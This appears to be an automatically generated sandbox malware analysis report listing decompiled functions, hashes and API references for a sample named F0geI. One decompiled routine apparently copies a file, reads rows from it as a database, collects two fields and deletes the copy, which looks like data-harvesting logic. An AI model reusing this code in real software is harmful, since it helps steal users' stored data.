Instruction ID: 6009be71583d5b4970b192074538a43939151051f19ea94d5b900f3dd88f6011
Opcode Fuzzy Hash: 9fdacd669fdcdafbe7e014797b45e44567de6dd3f312136f34c8ba13df4fe3ba
Instruction Fuzzy Hash: CB417570A40228BBDB24EB90DD49BDA7374AB48704F0045AAB508B72C1D7F95AD5CF59

Uniqueness

Uniqueness Score: -1.00%

Function 00430FAA Relevance: 16.7, APIs: 11, Instructions: 238COMMON

Download Yara Rule

APIs

_get_int_arg.LIBCMTD ref: 00430FAE
__get_printf_count_output.LIBCMTD ref: 00430FBC
__errno.LIBCMTD ref: 00431022
_LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 00431058
_write_multi_char.LIBCMTD ref: 004315EB
_write_string.LIBCMTD ref: 00431606
_write_multi_char.LIBCMTD ref: 00431632
__mbtowc_l.LIBCMTD ref: 004316A1

Memory Dump Source

Source File: 00000014.00000002.440482009.0000000000412000.00000020.00000001.01000000.00000006.sdmp, Offset: 00412000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_412000_F0geI.jbxd

Similarity

API ID: Locale_write_multi_char$UpdateUpdate::~___errno__get_printf_count_output__mbtowc_l_get_int_arg_write_string
String ID:
API String ID: 703810477-0
Opcode ID: 83aee01e5547a70ed7e6d9285c6afc650e3112415a577fb90558f1cd27df42b6
Instruction ID: 09345f63ed7e6f9298223f806110a78fac50aadeae85ae894961fc24b627c898
Opcode Fuzzy Hash: 83aee01e5547a70ed7e6d9285c6afc650e3112415a577fb90558f1cd27df42b6
Instruction Fuzzy Hash: D6A17FF0E002189BDB24DF45CC95BEEB3B4AB48304F14519AE6197B292D7789E84CF5D

Uniqueness

Uniqueness Score: -1.00%

Function 0042FA85 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 225COMMON

Download Yara Rule

APIs

_get_int_arg.LIBCMTD ref: 0042FA89
_write_multi_char.LIBCMTD ref: 0043025E
_write_string.LIBCMTD ref: 00430279
_write_multi_char.LIBCMTD ref: 004302A5
_wctomb_s.LIBCMTD ref: 00430322

Strings

-, xrefs: 004301FE

Memory Dump Source

Source File: 00000014.00000002.440482009.0000000000412000.00000020.00000001.01000000.00000006.sdmp, Offset: 00412000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_412000_F0geI.jbxd

Similarity

API ID: _write_multi_char$_get_int_arg_wctomb_s_write_string
String ID: -
API String ID: 557302112-2547889144
Opcode ID: ce3baeaae392aa5525ae5ae748688f599395809c67ab856bd2b4938cabbf0e09
Instruction ID: 97e9e53a55d9c7f2f9b9026c06879c4fc2e96d3f854523c43620616b097d2291
Opcode Fuzzy Hash: ce3baeaae392aa5525ae5ae748688f599395809c67ab856bd2b4938cabbf0e09
Instruction Fuzzy Hash: A7A18F70D012289FDF64CF54CC99BEEB7B1AB48304F5482EAE4096B291D7789E84CF59

Uniqueness

Uniqueness Score: -1.00%

Function 00428CB0 Relevance: 15.1, APIs: 10, Instructions: 135COMMON

Download Yara Rule

APIs

_cmpDWORD.LIBCMTD ref: 00428CBE

Part of subcall function 00428F40: _cmpBYTE.LIBCMTD ref: 00428F78

_cmpDWORD.LIBCMTD ref: 00428CE5

Memory Dump Source

Source File: 00000014.00000002.440482009.0000000000412000.00000020.00000001.01000000.00000006.sdmp, Offset: 00412000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_412000_F0geI.jbxd

Similarity

API ID: _cmp
String ID:
API String ID: 2028851527-0
Opcode ID: c8f3e292c3b1e8bb93b3af797200ed8ae75d1eaad313a1fa08ee5c27a5052a11
Instruction ID: c519f4dcc2cb22526c2c3f65a94b32e6156838b2b49557c5b1d95bf76d6f3455
Opcode Fuzzy Hash: c8f3e292c3b1e8bb93b3af797200ed8ae75d1eaad313a1fa08ee5c27a5052a11
Instruction Fuzzy Hash: 18513271A02118EFCB04DFBCEA48A9DBBB5AB40305F91855DE409AB249DB349F44DB54

Uniqueness

Uniqueness Score: -1.00%

Function 0042062A Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 205COMMON

Download Yara Rule

APIs

__un_inc.LIBCMTD ref: 00420818
__inc.LIBCMTD ref: 0042084A
__inc.LIBCMTD ref: 00420909
__mbtowc_l.LIBCMTD ref: 0042094B

Strings

, xrefs: 00420883
c, xrefs: 004209C5

Memory Dump Source

Source File: 00000014.00000002.440482009.0000000000412000.00000020.00000001.01000000.00000006.sdmp, Offset: 00412000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_412000_F0geI.jbxd

Similarity

API ID: __inc$__mbtowc_l__un_inc
String ID: $c
API String ID: 579247601-3797896886
Opcode ID: 27eaf5ec369bf2605294908d3608e0bb67ffb8760d3954b98b07801aa536f58c
Instruction ID: b9e472e2ce2df36fac2c0f239223ba567e220fd7a13c671cc3a2029d4395fcb2
Opcode Fuzzy Hash: 27eaf5ec369bf2605294908d3608e0bb67ffb8760d3954b98b07801aa536f58c
Instruction Fuzzy Hash: 8091C1B0E04268DBCF24CB95E8946EEB7B1AF55304F54819BD85A6B313C2389E80CF49

Uniqueness

Uniqueness Score: -1.00%

Function 00407213 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 145
fileCOMMON

Download Yara Rule

C-Code - Quality: 19%

			E00407213(intOrPtr* __ecx, intOrPtr _a4, void* _a8) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _t24;
				void* _t25;
				void* _t27;
				intOrPtr* _t32;
				intOrPtr* _t39;
				void* _t40;
				intOrPtr* _t41;
				intOrPtr* _t43;
				intOrPtr _t44;
				intOrPtr _t45;
				intOrPtr _t47;
				intOrPtr _t48;
				intOrPtr _t51;
				intOrPtr _t52;
				intOrPtr* _t59;
				intOrPtr* _t69;
				intOrPtr _t82;
				intOrPtr _t84;
				intOrPtr _t85;
				void* _t87;
				void* _t89;
				void* _t90;
				void* _t91;

				_t59 = __ecx;
				if(_a8 == 0) {
					L18:
					return 0;
				}
				_t24 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
				_t25 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
				_a8 = _t25;
				_t87 =  *((intOrPtr*)( *0x40e000))(_t24, _a4,  *0x40e284);
				_t27 = E0040A69E( *0x40e000,  &_a8);
				_t89 = _a8;
				if(_t27 == 0) {
					L16:
					LocalFree(_t87);
					L17:
					DeleteFileW(_t89);
					LocalFree(_t89);
					goto L18;
				}
				_push(0);
				_push(_t89);
				_push(_t87);
				if( *((intOrPtr*)( *0x40e184))() == 0) {
					goto L16;
				}
				_t32 =  *0x40e488; // 0x6d8bda30
				_push( &_v8);
				_push(_t89);
				if( *_t32() != 0) {
					L11:
					DeleteFileW(_t89);
					if(_t89 != 0) {
						LocalFree(_t89);
					}
					if(_t87 != 0) {
						LocalFree(_t87);
					}
					return 1;
				}
				_t39 =  *0x40e494; // 0x6d7db910
				_t40 =  *_t39(_v8,  *0x40e238, 0xffffffff,  &_a8, 0);
				_t91 = _t90 + 0x14;
				if(_t40 == 0) {
					while(1) {
						_push(_a8);
						_t41 =  *0x40e48c; // 0x6d768060
						if( *_t41() != 0x64) {
							break;
						}
						_t43 =  *0x40e4b4; // 0x6d7624b0
						_t44 =  *_t43(_a8, 0);
						_t69 =  *0x40e4b4; // 0x6d7624b0
						_v12 = _t44;
						_t45 =  *_t69(_a8, 1);
						_t91 = _t91 + 0x10;
						_v16 = _t45;
						_push(_v12);
						if( *((intOrPtr*)( *0x40e08c))() > 1) {
							_t47 = E0040A503( *_t59, _v12);
							_t82 =  *0x40e228; // 0x4e5b40
							 *_t59 = _t47;
							_t48 = E0040A503(_t47, _t82);
							_push(_v16);
							 *_t59 = _t48;
							if( *((intOrPtr*)( *0x40e08c))() > 1) {
								_t51 = E0040A503( *_t59, _v16);
								_t84 =  *0x40e228; // 0x4e5b40
								 *_t59 = _t51;
								_t52 = E0040A503(_t51, _t84);
								_t85 =  *0x40e228; // 0x4e5b40
								 *_t59 = _t52;
								 *_t59 = E0040A503(_t52, _t85);
							}
						}
					}
					 *0x40e4b0(_a8);
					 *0x40e4a4(_v8);
					goto L11;
				} else {
					LocalFree(_t87);
					 *0x40e4b0(_a8);
					 *0x40e4a4(_v8);
					goto L17;
				}
			}

0x00407220
0x00407222
0x004073c0
0x00000000
0x004073c0
0x00407235
0x00407242
0x00407253
0x0040725c
0x0040725e
0x00407263
0x00407268
0x004073ab
0x004073ac
0x004073b2
0x004073b3
0x004073ba
0x00000000
0x004073ba
0x00407274
0x00407276
0x00407277
0x0040727c
0x00000000
0x00000000
0x00407282
0x0040728a
0x0040728b
0x00407292
0x00407389
0x0040738a
0x00407392
0x00407395
0x00407395
0x0040739d
0x004073a0
0x004073a0
0x00000000
0x004073a8
0x00407298
0x004072ae
0x004072b0
0x004072b5
0x00407361
0x00407361
0x00407364
0x0040736f
0x00000000
0x00000000
0x004072db
0x004072e5
0x004072e7
0x004072f2
0x004072f5
0x004072fd
0x00407300
0x00407303
0x0040730b
0x00407312
0x00407317
0x0040731f
0x00407321
0x00407326
0x00407329
0x00407335
0x0040733c
0x00407341
0x00407349
0x0040734b
0x00407350
0x00407358
0x0040735f
0x0040735f
0x00407335
0x0040730b
0x00407378
0x00407381
0x00000000
0x004072bb
0x004072bc
0x004072c5
0x004072ce
0x00000000
0x004072d5

APIs

Part of subcall function 0040A69E: LocalFree.KERNEL32(00000000,?,?,0040B2D2), ref: 0040A701

LocalFree.KERNEL32(00000000), ref: 004072BC
DeleteFileW.KERNEL32(00000000,?), ref: 0040738A
LocalFree.KERNEL32(00000000), ref: 00407395
LocalFree.KERNEL32(00000000), ref: 004073A0
LocalFree.KERNEL32(00000000), ref: 004073AC
DeleteFileW.KERNEL32(00000000), ref: 004073B3
LocalFree.KERNEL32(00000000), ref: 004073BA

Strings

@[N, xrefs: 00407317, 00407341, 00407350

Memory Dump Source

Source File: 00000014.00000002.439745303.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.440168036.0000000000410000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_F0geI.jbxd

Yara matches

Similarity

API ID: FreeLocal$DeleteFile
String ID: @[N
API String ID: 2194112602-1206959322
Opcode ID: 5a4f429bb92c1425083624027269dac2f6f66512f29d3a46626db28773defc43
Instruction ID: e8c6905146b6e6fcb6e5b83ffe865c27a3063a5e14c3c7fc069cf135c206e258
Opcode Fuzzy Hash: 5a4f429bb92c1425083624027269dac2f6f66512f29d3a46626db28773defc43
Instruction Fuzzy Hash: 17419431504110AFEB099F66EE85E6E37B5EF44320F104839FD15FB2A0DB78A921DB5A

Uniqueness

Uniqueness Score: -1.00%

Function 00430DD4 Relevance: 12.2, APIs: 8, Instructions: 222COMMON

Download Yara Rule

APIs

_get_int_arg.LIBCMTD ref: 00430DD8
_write_multi_char.LIBCMTD ref: 004315EB
_write_string.LIBCMTD ref: 00431606
_write_multi_char.LIBCMTD ref: 00431632
__mbtowc_l.LIBCMTD ref: 004316A1

Memory Dump Source

Source File: 00000014.00000002.440482009.0000000000412000.00000020.00000001.01000000.00000006.sdmp, Offset: 00412000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_412000_F0geI.jbxd

Similarity

API ID: _write_multi_char$__mbtowc_l_get_int_arg_write_string
String ID:
API String ID: 4186970751-0
Opcode ID: a0cf7bf72d40c6b3fcfa4398c383bd4095b36ac00e10a8f1071b07447650425d
Instruction ID: 59376063915a0a8db93da85e9deece7cf929ebc1784357db36357fb5499e79b7
Opcode Fuzzy Hash: a0cf7bf72d40c6b3fcfa4398c383bd4095b36ac00e10a8f1071b07447650425d
Instruction Fuzzy Hash: 5FA17DF1E002189BDB24CF55CC91BEEB3B5AF48304F14919AE6096B292D7389E84CF59

Uniqueness

Uniqueness Score: -1.00%

Function 00428A58 Relevance: 12.1, APIs: 8, Instructions: 103COMMON

Download Yara Rule

APIs

_cmpDWORD.LIBCMTD ref: 00428A66

Part of subcall function 00428F40: _cmpBYTE.LIBCMTD ref: 00428F78

_cmpDWORD.LIBCMTD ref: 00428A8D

Memory Dump Source

Source File: 00000014.00000002.440482009.0000000000412000.00000020.00000001.01000000.00000006.sdmp, Offset: 00412000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_412000_F0geI.jbxd

Similarity

API ID: _cmp
String ID:
API String ID: 2028851527-0
Opcode ID: 000ccbe2cadb759e74cd5e7df1b3dfedffdf27a34ef9d4f6f82d792d1a5bf3d5
Instruction ID: 789ec6b790b3460523aa97c3653b34ec8f1834b2997240226c4a151201fd5581
Opcode Fuzzy Hash: 000ccbe2cadb759e74cd5e7df1b3dfedffdf27a34ef9d4f6f82d792d1a5bf3d5
Instruction Fuzzy Hash: 6B315471A02118EFCB04EFBCEA48AAD7B75AB40305F91815EF409AB245DE38AF41DB55

Uniqueness

Uniqueness Score: -1.00%

Function 0042B555 Relevance: 10.7, APIs: 7, Instructions: 165COMMON

Download Yara Rule

APIs

__errno.LIBCMTD ref: 0042B555

Part of subcall function 00419D50: __getptd_noexit.LIBCMTD ref: 00419D56

_memset.LIBCMT ref: 0042B5E6
__errno.LIBCMTD ref: 0042B5EE
__errno.LIBCMTD ref: 0042B5F8
_memset.LIBCMT ref: 0042B6C3
__errno.LIBCMTD ref: 0042B718

Memory Dump Source

Source File: 00000014.00000002.440482009.0000000000412000.00000020.00000001.01000000.00000006.sdmp, Offset: 00412000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_412000_F0geI.jbxd

Similarity

API ID: __errno$_memset$__getptd_noexit
String ID:
API String ID: 4262221207-0
Opcode ID: c3de8bdb0bd3d2021b5b8e9d24e112d6a6bb03619bd3f07dca8100efc64d381b
Instruction ID: ea409ff7ec6aca4b4ad4ab9628627815d2f39d53bb3e6b11bd0a1de42637db43
Opcode Fuzzy Hash: c3de8bdb0bd3d2021b5b8e9d24e112d6a6bb03619bd3f07dca8100efc64d381b
Instruction Fuzzy Hash: B4617C70A00219EFCF14CF58D945AAE33B1EF84328F60821AE8296B3D5D7399D41CF99

Uniqueness

Uniqueness Score: -1.00%

Function 00420664 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 108COMMON

Download Yara Rule

APIs

__un_inc.LIBCMTD ref: 00420818
__inc.LIBCMTD ref: 0042084A
__inc.LIBCMTD ref: 00420909
__mbtowc_l.LIBCMTD ref: 0042094B

Strings

, xrefs: 00420883
{, xrefs: 0042088C

Memory Dump Source

Source File: 00000014.00000002.440482009.0000000000412000.00000020.00000001.01000000.00000006.sdmp, Offset: 00412000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_412000_F0geI.jbxd

Similarity

API ID: __inc$__mbtowc_l__un_inc
String ID: ${
API String ID: 579247601-4046706400
Opcode ID: dc69d8516cc11fe7fadc67670a898c0b1153202439d2a7f05566148b15abe76a
Instruction ID: 1055374d518e5f5b73a788cd124758a6c5e3ef42acecea30e9f68282066d24a0
Opcode Fuzzy Hash: dc69d8516cc11fe7fadc67670a898c0b1153202439d2a7f05566148b15abe76a
Instruction Fuzzy Hash: E541E4B0E01368DFCF24DB95E8846EEB7B1AF54304F54829AD41A67313D6389A80CF49

Uniqueness

Uniqueness Score: -1.00%

Function 0042FF07 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 104COMMON

Download Yara Rule

APIs

_get_int64_arg.LIBCMTD ref: 0042FF68
__aullrem.LIBCMT ref: 00430135
__aulldiv.LIBCMT ref: 00430157

Strings

0, xrefs: 0042FF23
9, xrefs: 00430168
', xrefs: 0042FF07

Memory Dump Source

Source File: 00000014.00000002.440482009.0000000000412000.00000020.00000001.01000000.00000006.sdmp, Offset: 00412000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_412000_F0geI.jbxd

Similarity

API ID: __aulldiv__aullrem_get_int64_arg
String ID: '$0$9
API String ID: 3120068967-269856862
Opcode ID: d65ada69c6f0448e455e8efc2762e98b2572393252772e8e5edb01c5ee491a82
Instruction ID: ef80cffb82c7ee0d620c241a3dff5ded7c6569a569e687b7e648e20a43cd6067
Opcode Fuzzy Hash: d65ada69c6f0448e455e8efc2762e98b2572393252772e8e5edb01c5ee491a82
Instruction Fuzzy Hash: 4741E571D06229DFDB64CF58D8A9BAEB7B5FB48304F1486EAD008A7240C7399E85CF45

Uniqueness

Uniqueness Score: -1.00%

Function 00428B84 Relevance: 10.6, APIs: 7, Instructions: 103COMMON

Download Yara Rule

APIs

_cmpDWORD.LIBCMTD ref: 00428B92

Part of subcall function 00428F40: _cmpBYTE.LIBCMTD ref: 00428F78

_cmpDWORD.LIBCMTD ref: 00428BB9

Memory Dump Source

Source File: 00000014.00000002.440482009.0000000000412000.00000020.00000001.01000000.00000006.sdmp, Offset: 00412000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_412000_F0geI.jbxd

Similarity

API ID: _cmp
String ID:
API String ID: 2028851527-0
Opcode ID: 19dc914e4a0633765d336c19ed3a3f14afb2883500002485b60d4641ba5bd03d
Instruction ID: 09e779532c7962625a25b6a3118f594af604480c47d30444c376482f5ac8ff98
Opcode Fuzzy Hash: 19dc914e4a0633765d336c19ed3a3f14afb2883500002485b60d4641ba5bd03d
Instruction Fuzzy Hash: ED313371A02118EFCB04DFBCEA489AD7B75AB40305F91C15EF449AB209DE38AF45DB58

Uniqueness

Uniqueness Score: -1.00%

Function 00428940 Relevance: 10.6, APIs: 7, Instructions: 96COMMON

Download Yara Rule

APIs

_cmpDWORD.LIBCMTD ref: 0042894E

Part of subcall function 00428F40: _cmpBYTE.LIBCMTD ref: 00428F78

_cmpDWORD.LIBCMTD ref: 00428975

Memory Dump Source

Source File: 00000014.00000002.440482009.0000000000412000.00000020.00000001.01000000.00000006.sdmp, Offset: 00412000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_412000_F0geI.jbxd

Similarity

API ID: _cmp
String ID:
API String ID: 2028851527-0
Opcode ID: 78c03d3718f2390d31f8b063bc65ce1d810f83c356c66c6654849dcd724319e6
Instruction ID: 9c2e0ac5a81b51015fbc54fc562c241c41ef6e53ee4f6753c511bf4ecc86f314
Opcode Fuzzy Hash: 78c03d3718f2390d31f8b063bc65ce1d810f83c356c66c6654849dcd724319e6
Instruction Fuzzy Hash: A9317471A02118EFCB04EFBCEA48AAD7B75AB40305F91815EE449B7205DE38EF41DB54

Uniqueness

Uniqueness Score: -1.00%

Function 00420A0A Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 92COMMON

Download Yara Rule

APIs

__inc.LIBCMTD ref: 00420A69
__inc.LIBCMTD ref: 00420A9C
_isxdigit.LIBCMTD ref: 00420BBD
__hextodec.LIBCMTD ref: 00420BF0
_isdigit.LIBCMTD ref: 00420C16
__inc.LIBCMTD ref: 00420D00
__un_inc.LIBCMTD ref: 00420D24

Strings

p, xrefs: 00420BAF
0, xrefs: 00420A4F

Memory Dump Source

Source File: 00000014.00000002.440482009.0000000000412000.00000020.00000001.01000000.00000006.sdmp, Offset: 00412000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_412000_F0geI.jbxd

Similarity

API ID: __inc$__hextodec__un_inc_isdigit_isxdigit
String ID: 0$p
API String ID: 500523077-2059906072
Opcode ID: b0356fd5653e0a6f6e224d2ad77bfed6b82b230c62960876a50289a7ee23f875
Instruction ID: a3020a5fbde0ace490a1d92676205228b3d3f57a385478ac9b20bcf3b838cca1
Opcode Fuzzy Hash: b0356fd5653e0a6f6e224d2ad77bfed6b82b230c62960876a50289a7ee23f875
Instruction Fuzzy Hash: 3D4154B4E052798BCF25CFA5E8943EEBBF1AF55308F64819BC41966203D2395A81CF49

Uniqueness

Uniqueness Score: -1.00%

Function 0042FEF4 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 106COMMON

Download Yara Rule

APIs

_get_int64_arg.LIBCMTD ref: 0042FF68
__aullrem.LIBCMT ref: 00430135
__aulldiv.LIBCMT ref: 00430157

Strings

0, xrefs: 0042FF23
9, xrefs: 00430168

Memory Dump Source

Source File: 00000014.00000002.440482009.0000000000412000.00000020.00000001.01000000.00000006.sdmp, Offset: 00412000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_412000_F0geI.jbxd

Similarity

API ID: __aulldiv__aullrem_get_int64_arg
String ID: 0$9
API String ID: 3120068967-1975997740
Opcode ID: 41ba9041e073bb15ec53c3d68c0243438a2683b8a4d8a65e34a2c78bd0c82506
Instruction ID: 17c75193d5e66341643ac04ad05f83e29f20ddbe34abb2b5208df055b995ecf8
Opcode Fuzzy Hash: 41ba9041e073bb15ec53c3d68c0243438a2683b8a4d8a65e34a2c78bd0c82506
Instruction Fuzzy Hash: 6E41F571D06229DFDB64CF48D8A9BAEB7B5FB49304F5086AAD008A7240C7395E85CF45

Uniqueness

Uniqueness Score: -1.00%

Function 00431279 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 105COMMON

Download Yara Rule

APIs

_get_int64_arg.LIBCMTD ref: 004312E0
__aullrem.LIBCMT ref: 004314B0
__aulldiv.LIBCMT ref: 004314D2

Strings

', xrefs: 00431279
9, xrefs: 004314E3

Memory Dump Source

Source File: 00000014.00000002.440482009.0000000000412000.00000020.00000001.01000000.00000006.sdmp, Offset: 00412000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_412000_F0geI.jbxd

Similarity

API ID: __aulldiv__aullrem_get_int64_arg
String ID: '$9
API String ID: 3120068967-1823400153
Opcode ID: e8478181fbcf0d97f5aaa5d4289ea9646e2b5478815b3089824e4077cb9ac537
Instruction ID: 33966614cb291029f0c7f667bd4cfbcc9821d282900e84767b526b2402c629c4
Opcode Fuzzy Hash: e8478181fbcf0d97f5aaa5d4289ea9646e2b5478815b3089824e4077cb9ac537
Instruction Fuzzy Hash: 694135B0E002299FDB24CF48C841BAEB7B5FF89314F1051AAD148AB251C3389E81CF1A

Uniqueness

Uniqueness Score: -1.00%

Function 00420B37 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 81COMMON

Download Yara Rule

APIs

__inc.LIBCMTD ref: 00420B85
_isxdigit.LIBCMTD ref: 00420BBD
__hextodec.LIBCMTD ref: 00420BF0

Strings

+, xrefs: 00420B50
p, xrefs: 00420BAF

Memory Dump Source

Source File: 00000014.00000002.440482009.0000000000412000.00000020.00000001.01000000.00000006.sdmp, Offset: 00412000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_412000_F0geI.jbxd

Similarity

API ID: __hextodec__inc_isxdigit
String ID: +$p
API String ID: 3003077261-1790238857
Opcode ID: d5f280f2fa3220834aed4b8a45a1ba7957958c050bee697402ae40ae9c2d1f26
Instruction ID: 70ae99dea26e9fda4ea79188d22675bc92693f72982ea39d00ca0f601ce3ed33
Opcode Fuzzy Hash: d5f280f2fa3220834aed4b8a45a1ba7957958c050bee697402ae40ae9c2d1f26
Instruction Fuzzy Hash: B33150B0E052A98BCF25CFA5D8543EEBBB1AF15308F5441DBC41966203D2795A81CF49

Uniqueness

Uniqueness Score: -1.00%

Function 0041F561 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 69COMMON

Download Yara Rule

APIs

__set_error_mode.LIBCMTD ref: 0041F5C8
__set_error_mode.LIBCMTD ref: 0041F5D7

Strings

SN, xrefs: 0041F5B8
jjj, xrefs: 0041F5B0
t/j, xrefs: 0041F601

Memory Dump Source

Source File: 00000014.00000002.440482009.0000000000412000.00000020.00000001.01000000.00000006.sdmp, Offset: 00412000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_412000_F0geI.jbxd

Similarity

API ID: __set_error_mode
String ID: jjj$t/j$SN
API String ID: 167136767-292791468
Opcode ID: 0f3f3eb1433c1d13d63198b302bc914cf58cc9f7b1ed1b0aa788c9b33ad61992
Instruction ID: 72bc7d515c62c63b3c953949aec6e500fbe1c61f3963da58caf0db55085d0050
Opcode Fuzzy Hash: 0f3f3eb1433c1d13d63198b302bc914cf58cc9f7b1ed1b0aa788c9b33ad61992
Instruction Fuzzy Hash: D321F474A40108FBDB20CF44E995BEE33B5AB05314F60453AE40A922E2D3399F97DA89

Uniqueness

Uniqueness Score: -1.00%

Function 0040A2AA Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 117
memoryCOMMON

Download Yara Rule

C-Code - Quality: 52%

			E0040A2AA(intOrPtr __ecx, intOrPtr* __edx, intOrPtr _a4) {
				void* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				intOrPtr _t25;
				void* _t29;
				void* _t30;
				void* _t39;
				void* _t47;
				void* _t52;
				intOrPtr _t54;
				void* _t70;
				void* _t77;
				intOrPtr* _t80;
				void* _t82;
				intOrPtr* _t83;
				signed int _t85;

				_t25 =  *0x40e1b8; // 0x4e5b60
				_v12 = _t25;
				_v20 = __edx;
				_v16 = __ecx;
				_t29 = LocalAlloc(0x40, 0x100 +  *((intOrPtr*)( *0x40e08c))(__ecx) * 2);
				_t54 = _v16;
				_t52 = _t29;
				_t30 = 2;
				_t76 =  ==  ? _t30 : 0;
				_t77 = ( ==  ? _t30 : 0) + _t54;
				if(_t77 != 0) {
					do {
						_t39 = LocalAlloc(0x40, 0x100 +  *((intOrPtr*)( *0x40e08c))(_t54) * 2);
						_v8 = _t39;
						_t82 =  *((intOrPtr*)( *0x40e18c))(_t77,  *0x40e258);
						if(_t82 == 0) {
							if(_a4 == 0) {
								_push(_t77);
								if(E0040A3E4(_t77,  &_v8, 0,  *((intOrPtr*)( *0x40e08c))()) != 0) {
									_t47 = E0040A503(_t52, _v12);
									_t70 = _v8;
									goto L9;
								}
							} else {
								_t47 = E0040A503(_t52, _v12);
								_t70 = _a4;
								L9:
								_t52 = E0040A503(_t47, _t70);
							}
							_t83 = _v20;
							 *_t83 =  *((intOrPtr*)( *0x40e13c))( *_t83, _t52);
							_t77 = 0;
						} else {
							_t85 = _t82 - _t77 >> 1;
							if(E0040A3E4(_t77,  &_v8, 0, _t85) != 0) {
								_t52 = E0040A503(E0040A503(_t52, _v12), _v8);
							}
							_t77 = _t77 + _t85 * 2 + 2;
						}
						LocalFree(_v8);
						_t54 = _v16;
					} while (_t77 != 0);
				}
				_t80 = _v20;
				 *_t80 =  *((intOrPtr*)( *0x40e13c))( *_t80, _t52);
				LocalFree(_t52);
				return 1;
			}

0x0040a2b0
0x0040a2be
0x0040a2c7
0x0040a2ca
0x0040a2d9
0x0040a2db
0x0040a2e2
0x0040a2e4
0x0040a2e9
0x0040a2ec
0x0040a2ee
0x0040a2f4
0x0040a30c
0x0040a31b
0x0040a320
0x0040a324
0x0040a35f
0x0040a375
0x0040a389
0x0040a390
0x0040a395
0x00000000
0x0040a395
0x0040a361
0x0040a366
0x0040a36b
0x0040a398
0x0040a39f
0x0040a39f
0x0040a3a1
0x0040a3ae
0x0040a3b0
0x0040a326
0x0040a32b
0x0040a33b
0x0040a351
0x0040a351
0x0040a356
0x0040a356
0x0040a3b5
0x0040a3bb
0x0040a3be
0x0040a2f4
0x0040a3c6
0x0040a3d4
0x0040a3d6
0x0040a3e3

APIs

LocalAlloc.KERNEL32(00000040,00000000,?,00000000,00000000,?), ref: 0040A2D9
LocalAlloc.KERNEL32(00000040,00000000,?,00000000,00000000,?), ref: 0040A30C
LocalFree.KERNEL32(?,?,00000000,00000000,?), ref: 0040A3B5

Part of subcall function 0040A3E4: LocalAlloc.KERNEL32(00000040,00000000,?,0040870A,00000000,00000000,?,?,?,?,?,?,004079E3), ref: 0040A40C
Part of subcall function 0040A3E4: LocalFree.KERNEL32(00000000,?,0040870A,00000000,00000000,?,?,?,?,?,?,004079E3), ref: 0040A449

Part of subcall function 0040A503: lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,?,00408633), ref: 0040A516
Part of subcall function 0040A503: lstrlenW.KERNEL32(?,?,00000000,?,00000000,00000000,?,00408633), ref: 0040A51D
Part of subcall function 0040A503: LocalAlloc.KERNEL32(00000040,00000000,?,00000000,?,00000000,00000000,?,00408633), ref: 0040A533
Part of subcall function 0040A503: GlobalFree.KERNEL32(?), ref: 0040A550

LocalFree.KERNEL32(00000000,?,00000000,00000000,?), ref: 0040A3D6

Strings

`[N, xrefs: 0040A2B0

Memory Dump Source

Source File: 00000014.00000002.439745303.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.440168036.0000000000410000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_F0geI.jbxd

Yara matches

Similarity

API ID: Local$AllocFree$lstrlen$Global
String ID: `[N
API String ID: 1425192967-2143156794
Opcode ID: 16cf261d91fc909ca7edb2e35f5703406e063cb1cbf4963b31a85fac73282971
Instruction ID: 8d9fe808253cfd760579b52592682b105d53dbc0a4ab2c38afac3778b4664aea
Opcode Fuzzy Hash: 16cf261d91fc909ca7edb2e35f5703406e063cb1cbf4963b31a85fac73282971
Instruction Fuzzy Hash: 5A419572A00314EFDB14DFA5DD81AAE77B5EB88310F10497AE941B7390DBB89D20CB95

Uniqueness

Uniqueness Score: -1.00%

Function 00431266 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 107COMMON

Download Yara Rule

APIs

_get_int64_arg.LIBCMTD ref: 004312E0
__aullrem.LIBCMT ref: 004314B0
__aulldiv.LIBCMT ref: 004314D2

Strings

9, xrefs: 004314E3

Memory Dump Source

